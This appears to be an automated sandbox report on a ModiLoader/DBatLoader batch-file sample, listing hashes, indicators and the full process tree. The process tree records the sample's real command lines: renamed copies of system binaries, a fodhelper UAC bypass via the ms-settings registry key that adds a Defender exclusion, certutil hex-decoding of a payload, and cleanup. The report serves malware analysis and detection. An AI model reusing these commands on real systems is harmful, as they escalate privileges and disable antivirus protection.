Analysis

max time kernel: 51s
max time network: 16s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 26/03/2024, 08:25

Static task: static1

Behavioral task: behavioral1
  Sample: Order inquiry.bat
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: Order inquiry.bat
  Resource: win10-20240221-en
General

Target: Order inquiry.bat
Size: 3.1MB
MD5: 77266339f26515585f6996c37e3e7122
SHA1: 912e68d372a859015ee5e68e6f01348add0da395
SHA256: 4076e46f0972df38325a55a539cdddbd7f9d87b5ffd22cdf53c8187747609cda
SHA512: 268022315681c97be24af272fed1c5871e6bb4920b6009ed1df2a37c95cf68991b193d544eaa71412a009cbfa70948b0f57f7eac5619548c469b7a78403f82b7
SSDEEP: 24576:ywyJPcV/Hrrz6jT6vaQrAAAy4QE1FpVJQQul6kE82zg38H6HKpLJrvvfzrEZnfQs:JyJPcVHQNQrAAHEPJQT7Z38dEhg3xfO
Malware Config
Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage (1 IoC)

| resource | yara_rule |
| --- | --- |
| behavioral1/memory/2944-59-0x0000000003160000-0x0000000004160000-memory.dmp | modiloader_stage2 |

Executes dropped EXE (16 IoCs)

| pid | Process |
| --- | --- |
| 2976 | alpha.exe |
| 3008 | alpha.exe |
| 2592 | alpha.exe |
| 2644 | xkn.exe |
| 2708 | alpha.exe |
| 2808 | alpha.exe |
| 2476 | kn.exe |
| 2616 | alpha.exe |
| 2692 | kn.exe |
| 2944 | Lewxa.com |
| 2020 | alpha.exe |
| 320 | alpha.exe |
| 1520 | alpha.exe |
| 2812 | alpha.exe |
| 2732 | alpha.exe |
| 1924 | alpha.exe |

Loads dropped DLL (13 IoCs)

| pid | Process |
| --- | --- |
| 2064 | cmd.exe |
| 2064 | cmd.exe |
| 2064 | cmd.exe |
| 2592 | alpha.exe |
| 2644 | xkn.exe |
| 2644 | xkn.exe |
| 2644 | xkn.exe |
| 2064 | cmd.exe |
| 2808 | alpha.exe |
| 2064 | cmd.exe |
| 2616 | alpha.exe |
| 2780 | WerFault.exe |
| 2780 | WerFault.exe |

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)

| pid | pid_target | Process | procid_target |
| --- | --- | --- | --- |
| 2780 | 2944 | WerFault.exe | 43 |

Kills process with taskkill (2 IoCs)

| pid | Process |
| --- | --- |
| 1968 | taskkill.exe |
| 2508 | taskkill.exe |

Modifies registry class (5 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings | reg.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell | reg.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open | reg.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | reg.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command | reg.exe |

Modifies registry key (1 TTP, 1 IoC)

| pid | Process |
| --- | --- |
| 2848 | reg.exe |

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)

| pid | Process |
| --- | --- |
| 2944 | Lewxa.com |

Suspicious behavior: EnumeratesProcesses (1 IoC)

| pid | Process |
| --- | --- |
| 2644 | xkn.exe |

Suspicious use of AdjustPrivilegeToken (3 IoCs)

| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 2644 | xkn.exe |
| Token: SeDebugPrivilege | 1968 | taskkill.exe |
| Token: SeDebugPrivilege | 2508 | taskkill.exe |

Suspicious use of WriteProcessMemory (64 IoCs)

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2064 wrote to memory of 2912 | 2064 | cmd.exe | 29 |
| PID 2064 wrote to memory of 2912 | 2064 | cmd.exe | 29 |
| PID 2064 wrote to memory of 2912 | 2064 | cmd.exe | 29 |
| PID 2912 wrote to memory of 2916 | 2912 | cmd.exe | 30 |
| PID 2912 wrote to memory of 2916 | 2912 | cmd.exe | 30 |
| PID 2912 wrote to memory of 2916 | 2912 | cmd.exe | 30 |
| PID 2064 wrote to memory of 2976 | 2064 | cmd.exe | 31 |
| PID 2064 wrote to memory of 2976 | 2064 | cmd.exe | 31 |
| PID 2064 wrote to memory of 2976 | 2064 | cmd.exe | 31 |
| PID 2976 wrote to memory of 1704 | 2976 | alpha.exe | 32 |
| PID 2976 wrote to memory of 1704 | 2976 | alpha.exe | 32 |
| PID 2976 wrote to memory of 1704 | 2976 | alpha.exe | 32 |
| PID 2064 wrote to memory of 3008 | 2064 | cmd.exe | 33 |
| PID 2064 wrote to memory of 3008 | 2064 | cmd.exe | 33 |
| PID 2064 wrote to memory of 3008 | 2064 | cmd.exe | 33 |
| PID 3008 wrote to memory of 2540 | 3008 | alpha.exe | 34 |
| PID 3008 wrote to memory of 2540 | 3008 | alpha.exe | 34 |
| PID 3008 wrote to memory of 2540 | 3008 | alpha.exe | 34 |
| PID 2064 wrote to memory of 2592 | 2064 | cmd.exe | 35 |
| PID 2064 wrote to memory of 2592 | 2064 | cmd.exe | 35 |
| PID 2064 wrote to memory of 2592 | 2064 | cmd.exe | 35 |
| PID 2592 wrote to memory of 2644 | 2592 | alpha.exe | 36 |
| PID 2592 wrote to memory of 2644 | 2592 | alpha.exe | 36 |
| PID 2592 wrote to memory of 2644 | 2592 | alpha.exe | 36 |
| PID 2644 wrote to memory of 2708 | 2644 | xkn.exe | 37 |
| PID 2644 wrote to memory of 2708 | 2644 | xkn.exe | 37 |
| PID 2644 wrote to memory of 2708 | 2644 | xkn.exe | 37 |
| PID 2708 wrote to memory of 2848 | 2708 | alpha.exe | 38 |
| PID 2708 wrote to memory of 2848 | 2708 | alpha.exe | 38 |
| PID 2708 wrote to memory of 2848 | 2708 | alpha.exe | 38 |
| PID 2064 wrote to memory of 2808 | 2064 | cmd.exe | 39 |
| PID 2064 wrote to memory of 2808 | 2064 | cmd.exe | 39 |
| PID 2064 wrote to memory of 2808 | 2064 | cmd.exe | 39 |
| PID 2808 wrote to memory of 2476 | 2808 | alpha.exe | 40 |
| PID 2808 wrote to memory of 2476 | 2808 | alpha.exe | 40 |
| PID 2808 wrote to memory of 2476 | 2808 | alpha.exe | 40 |
| PID 2064 wrote to memory of 2616 | 2064 | cmd.exe | 41 |
| PID 2064 wrote to memory of 2616 | 2064 | cmd.exe | 41 |
| PID 2064 wrote to memory of 2616 | 2064 | cmd.exe | 41 |
| PID 2616 wrote to memory of 2692 | 2616 | alpha.exe | 42 |
| PID 2616 wrote to memory of 2692 | 2616 | alpha.exe | 42 |
| PID 2616 wrote to memory of 2692 | 2616 | alpha.exe | 42 |
| PID 2064 wrote to memory of 2944 | 2064 | cmd.exe | 43 |
| PID 2064 wrote to memory of 2944 | 2064 | cmd.exe | 43 |
| PID 2064 wrote to memory of 2944 | 2064 | cmd.exe | 43 |
| PID 2064 wrote to memory of 2944 | 2064 | cmd.exe | 43 |
| PID 2064 wrote to memory of 2020 | 2064 | cmd.exe | 44 |
| PID 2064 wrote to memory of 2020 | 2064 | cmd.exe | 44 |
| PID 2064 wrote to memory of 2020 | 2064 | cmd.exe | 44 |
| PID 2064 wrote to memory of 320 | 2064 | cmd.exe | 45 |
| PID 2064 wrote to memory of 320 | 2064 | cmd.exe | 45 |
| PID 2064 wrote to memory of 320 | 2064 | cmd.exe | 45 |
| PID 2064 wrote to memory of 1520 | 2064 | cmd.exe | 46 |
| PID 2064 wrote to memory of 1520 | 2064 | cmd.exe | 46 |
| PID 2064 wrote to memory of 1520 | 2064 | cmd.exe | 46 |
| PID 2064 wrote to memory of 2812 | 2064 | cmd.exe | 47 |
| PID 2064 wrote to memory of 2812 | 2064 | cmd.exe | 47 |
| PID 2064 wrote to memory of 2812 | 2064 | cmd.exe | 47 |
| PID 2064 wrote to memory of 2732 | 2064 | cmd.exe | 48 |
| PID 2064 wrote to memory of 2732 | 2064 | cmd.exe | 48 |
| PID 2064 wrote to memory of 2732 | 2064 | cmd.exe | 48 |
| PID 2732 wrote to memory of 1968 | 2732 | alpha.exe | 49 |
| PID 2732 wrote to memory of 1968 | 2732 | alpha.exe | 49 |
| PID 2732 wrote to memory of 1968 | 2732 | alpha.exe | 49 |
Processes
- PID 2064: C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - PID 2912: C:\Windows\system32\cmd.exe
    Command line: cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    Signatures: Suspicious use of WriteProcessMemory
    - PID 2916: C:\Windows\system32\extrac32.exe
      Command line: extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
  - PID 2976: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 1704: C:\Windows\system32\extrac32.exe
      Command line: extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
  - PID 3008: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 2540: C:\Windows\system32\extrac32.exe
      Command line: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - PID 2592: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - PID 2644: C:\Users\Public\xkn.exe
      Command line: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - PID 2708: C:\Users\Public\alpha.exe
        Command line: "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
        - PID 2848: C:\Windows\system32\reg.exe
          Command line: reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
          Signatures: Modifies registry class; Modifies registry key
  - PID 2808: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - PID 2476: C:\Users\Public\kn.exe
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Order inquiry.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      Signatures: Executes dropped EXE
  - PID 2616: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - PID 2692: C:\Users\Public\kn.exe
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      Signatures: Executes dropped EXE
  - PID 2944: C:\Users\Public\Libraries\Lewxa.com
    Command line: C:\\Users\\Public\\Libraries\\Lewxa.com
    Signatures: Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam
    - PID 2780: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 716
      Signatures: Loads dropped DLL; Program crash
  - PID 2020: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
    Signatures: Executes dropped EXE
  - PID 320: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
    Signatures: Executes dropped EXE
  - PID 1520: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - PID 2812: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - PID 2732: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 1968: C:\Windows\system32\taskkill.exe
      Command line: taskkill /F /IM SystemSettings.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - PID 1924: C:\Users\Public\alpha.exe
    Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
    Signatures: Executes dropped EXE
    - PID 2508: C:\Windows\system32\taskkill.exe
      Command line: taskkill /F /IM SystemSettingsAdminFlows.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads